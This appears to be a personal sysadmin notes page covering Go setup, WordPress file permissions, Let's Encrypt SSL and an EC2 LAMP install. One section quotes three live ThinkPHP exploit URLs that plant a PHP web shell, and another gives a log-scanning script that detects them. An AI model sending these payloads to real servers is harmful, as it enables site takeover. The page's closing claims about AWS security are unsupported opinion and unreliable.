source ~/.bashrc
Go (golang programming language)
Install Golang with Homebrew:
$ brew update
It takes a while to pull all the latest ... be patient ...
$ brew install golang
Go environment
$ vi .bashrc
Then add these lines to your .bashrc file to export the required variables:
export GOPATH=$HOME/go-workspace # don't forget to change your path correctly!
export GOROOT=/usr/local/opt/go/libexec
export PATH=$PATH:$GOPATH/bin
export PATH=$PATH:$GOROOT/bin
Create your workspace:
Create the workspace directories tree:
$ mkdir -p $GOPATH $GOPATH/src $GOPATH/pkg $GOPATH/bin
$GOPATH/src : Where your Go projects / programs are located
$GOPATH/pkg : Contains the compiled package objects
$GOPATH/bin : The compiled binaries home
source ~/.bashrc
Format your Go code
Go has a tool that automatically formats Go source code.
$ gofmt -w yourcode.go
OR
$ go fmt path/to/your/package
Go version
Once installed, run go version to see the installed version of Go.
davidr$ go version
go version go1.13.4 darwin/amd64
How to test SSL compliance?
https://www.ssllabs.com/ssltest/analyze.html?d=david.raleche.com&latest
WordPress Hacker Injection Techniques
https://xxxxxx.com/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=atpko.php&vars[1][]=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');
https://xxxxxxxx.com/?s=index/\think\template\driver\file/write&cacheFile=kolsk.php&content=<?php mb_ereg_replace('.',@$_REQUEST[_], '', 'e');
https://xxxxxx.com/?s=index/\think\template\driver\file/write&cacheFile=kolsk.php&content=
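To spot requests like the ones above in a web server access log, the following added example (not from the original post) matches their route and parameter shapes. It assumes a log where the client IP is the first field; the log lines are constructed samples.

```sh
#!/bin/sh
# Added example: flag access-log requests shaped like the URLs above.
# Patterns come from those URLs; the log lines are constructed samples.

# A backslash as it can appear in a log: raw, doubled by Apache's log
# escaping, or percent-encoded.
BS='(\\+|%5[Cc])'
# Routes seen above: invoke an arbitrary function, or write a template file.
ROUTE="s=/?index/${BS}think${BS}(app/invokefunction|template${BS}driver${BS}file/write)"
# Parameters that name a PHP function to call or a .php file to create.
PARAMS='(function=call_user_func_array|vars[^=&]*=file_put_contents|cacheFile=[^& ]*\.php)'

# Print the log lines in file $1 whose request matches either pattern.
suspicious_requests() {
  grep -E -i -e "$ROUTE" -e "$PARAMS" "$1"
}

# Print "count client_ip" for each client that sent such requests.
suspicious_clients() {
  suspicious_requests "$1" | awk '{ print $1 }' | sort | uniq -c |
    awk '{ print $1, $2 }'
}

# Constructed sample log (documentation IP ranges, payload bodies left out).
sample_log() {
  cat <<'EOF'
203.0.113.7 - - [10/Jan/2020:03:14:07 +0000] "GET /?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=atpko.php HTTP/1.1" 404 512
203.0.113.7 - - [10/Jan/2020:03:14:09 +0000] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=kolsk.php&content=x HTTP/1.1" 404 512
198.51.100.20 - - [10/Jan/2020:03:15:00 +0000] "GET /?s=golang+install HTTP/1.1" 200 8123
192.0.2.44 - - [10/Jan/2020:03:16:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2210
EOF
}

log=$(mktemp)
sample_log > "$log"
suspicious_clients "$log"   # one client, two matching requests
rm -f "$log"
```

A 200 response to such a request, or a new .php file appearing in the web root afterwards, is the signal to investigate further.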
yum install perl-CPAN.noarch
cpan install URI
Or
sudo yum install perl-libwww-perl
yum install perl-XML-SAX.noarch
Now you are ready to go!
Apache User
chown -R apache:apache .
Files
find . -type f -print0 | xargs -0 chmod 0400
Directory
find . -type d -print0 | xargs -0 chmod 0500
Writable storage and cache folders
chmod -R 700 storage/
chmod -R ug+rwx storage bootstrap/cache/
Files Permission – Unix Server
- Folders – 755
- Files – 644
- wp-config.php – 600
- .htaccess – 644, or 600
Unix command for directories 755
find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755
Unix command for files 644
find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644
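To check an existing site against the scheme above before (or after) running the chmod commands, the following added example, which is not part of the original post, lists every path whose mode deviates. The function names and the sample tree are constructed for the demonstration.

```sh
#!/bin/sh
# Added example: report paths whose mode differs from the scheme above
# (folders 755, files 644, wp-config.php 600, .htaccess 644 or 600).
# The site tree built by make_sample_site is constructed for the demo.

# Print one "<kind> want=<mode> <path>" line per deviation under $1.
audit_wp_perms() {
  find "$1" -type d ! -perm 755 -exec printf 'dir want=755 %s\n' {} \;
  find "$1" -type f -name wp-config.php ! -perm 600 \
    -exec printf 'file want=600 %s\n' {} \;
  find "$1" -type f -name .htaccess ! -perm 644 ! -perm 600 \
    -exec printf 'file want=644|600 %s\n' {} \;
  find "$1" -type f ! -name wp-config.php ! -name .htaccess ! -perm 644 \
    -exec printf 'file want=644 %s\n' {} \;
}

# Build a small tree with two deliberate deviations and print its path.
make_sample_site() {
  site=$(mktemp -d)
  mkdir -p "$site/wp-content/uploads"
  : > "$site/index.php"
  : > "$site/.htaccess"
  : > "$site/wp-config.php"
  chmod 755 "$site" "$site/wp-content"
  chmod 644 "$site/index.php" "$site/.htaccess"
  chmod 777 "$site/wp-content/uploads"   # deviation: world-writable folder
  chmod 644 "$site/wp-config.php"        # deviation: config readable by all
  echo "$site"
}

demo=$(make_sample_site)
audit_wp_perms "$demo"
rm -rf "$demo"
```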
Find hacked files
grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'
Refer to
https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.WebServerDB.CreateWebServer.html
Free SSL – Let’s encrypt
https://certbot.eff.org/lets-encrypt/debianjessie-apache
SSL INSTALLATION
wget https://dl.eff.org/certbot-auto
sudo mv certbot-auto /usr/local/bin/certbot-auto
sudo chown root /usr/local/bin/certbot-auto
sudo chmod 0755 /usr/local/bin/certbot-auto
sudo /usr/local/bin/certbot-auto --apache
(1) Modify /etc/httpd/conf.d/ssl.conf
(2) Make sure you close HTTP via the AWS inbound rules and ACL
THE SSL COMMAND
sudo /usr/local/bin/certbot-auto --apache
Activate htaccess
<Directory /var/www/xxxx>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Require all granted
</Directory>
Proper Directory and file permission
Directories 775
Files 664
Unix command for directories 755
find . -type d -print0 | xargs -0 chmod 0755
sudo find . -type d -print0 | sudo xargs -0 chmod 0755
Unix command for files 644
find . -type f -print0 | xargs -0 chmod 0644
sudo find . -type f -print0 | sudo xargs -0 chmod 0644
Unix User Apache
sudo chown -R apache:apache .
Find hacked files
grep -r --include=*.php -e '[[:alnum:]\/\+]\{137,\}'
Create instance ec2 with ssh access
(1) create ec2 instance
(2) create vpc. Make sure to have a public IPv4 DNS:
Get your VPC ID from your EC2 dashboard.
Go to VPC dashboard. Select your VPC with VPC ID.
Click on Actions and Select "Edit DNS Hostnames".
Select Yes and click Save.
Now you can find Public DNS IPv4 value in EC2 dashboard.
(3) create subnet – 172.30.3.0/24 (250 available IP addresses); make sure auto-assign IPv4 is enabled
(4) create internet gateway
(5) create route tables – ADD 0.0.0.0/0 to internet gateway
Install without verification
yum update -y
apache web server
<VirtualHost *:80>
DocumentRoot "/www/docs/host.example.com"
ServerName ec2-3-88-63-157.compute-1.amazonaws.com
ErrorLog "logs/host.example.com-error_log"
TransferLog "logs/host.example.com-access_log"
</VirtualHost>
SSL
$ wget https://dl.eff.org/certbot-auto
$ sudo mv certbot-auto /usr/local/bin/certbot-auto
$ sudo chown root /usr/local/bin/certbot-auto
$ sudo chmod 0755 /usr/local/bin/certbot-auto
$ /usr/local/bin/certbot-auto --help
/usr/local/bin/certbot-auto --debug --apache certonly -d raleche.com
Install new php package
sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 php7.2
sudo amazon-linux-extras enable php7.3
sudo yum -y install php-cli php-pdo php-fpm php-json php-mysqlnd
Start the Apache web server.
[ec2-user ~]$ sudo systemctl start httpd
Use the systemctl command to configure the Apache web server to start at each system boot.
[ec2-user ~]$ sudo systemctl enable httpd
You can verify that httpd is on by running the following command:
[ec2-user ~]$ sudo systemctl is-enabled httpd
To ensure that all of your software packages are up to date, perform a quick software update on your instance. This process may take a few minutes, but it is important to make sure that you have the latest security updates and bug fixes.
The -y option installs the updates without asking for confirmation. If you would like to examine the updates before installing, you can omit this option.
[ec2-user ~]$ sudo yum update -y
Install the lamp-mariadb10.2-php7.2 and php7.2 Amazon Linux Extras repositories to get the latest versions of the LAMP MariaDB and PHP packages for Amazon Linux 2.
[ec2-user ~]$ sudo amazon-linux-extras install -y lamp-mariadb10.2-php7.2 p
Many years ago, I was warned about AWS EC2 internal security breaches … Newly created EC2 instances are being used as proxies and so on, on IPv4 and IPv6 ports
The worst situation is having AWS customer support denying the sabotages. AWS = Heaven for hackers = nightmares for newbies in network security